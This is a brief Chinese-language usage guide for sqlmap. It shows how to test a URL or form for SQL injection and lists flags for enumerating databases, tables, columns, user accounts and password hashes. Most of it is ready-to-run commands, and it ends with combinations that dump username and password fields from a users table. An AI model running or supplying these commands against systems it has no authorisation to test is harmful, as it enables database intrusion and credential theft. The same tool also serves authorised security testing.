先安装 python环境(2.6.x或2.7版本) ,再将SQLMap 放在安装目录下
注意:sqlmap只是用来检测和利用sql注入点的,并不能扫描出网站有哪些漏洞,使用前请先使用扫描工具扫出sql注入点。
检测注入点是否可用 -u :注入点urlsqlmap.py -u "http://192.168.1.150/products.asp?id=134"
检测表单post提交 注入
sqlmap.py -u "http://192.168.1.150/products.asp" --forms
指定请求文件进行验证注入,可以用fiddle拦截请求并保存为文件
sqlmap.py -r "C:UsersAdministratorDesktopRawFile.html" --dbs
常用参数简介
注意大小写和前面的横杠数量
--dbs //指定输出所有数据库名称
--current-db //输出web当前使用数据库
--current-user //输出当前数据库用户名称
--users //输出所有用户名称
--passwords //输出所有用户密码
--tables //输出所有表名称
--columns //输出所有字段名称
--dump //导出结果
--technique //设置用于注入的技术
--dbms //指定测试的数据库类型
--start //指定开始的行
--stop //指定结束的行
-D //指定数据库名称
-T //指定表名称
-C //指定字段名称
-u //指定进行sql注入的http地址
-p //指定进行sql注入的参数
-r //指定进行sql注入的请求文件
常用参数搭配
1.输出DatabaseName数据库中所有表名称
-D DatabaseName --tables
2.输出DatabaseName数据库users表中的所有字段名称
-D DatabaseName -T users --columns
3.导出DatabaseName数据库users表中UserName,UserPassword字段数据
-D DatabaseName -T users -C "email,Username,userpassword" --dump
4.导出从1到10的10行数据
-D DatabaseName -T users -C "email,Username,userpassword" --start 1 --stop 10 --dump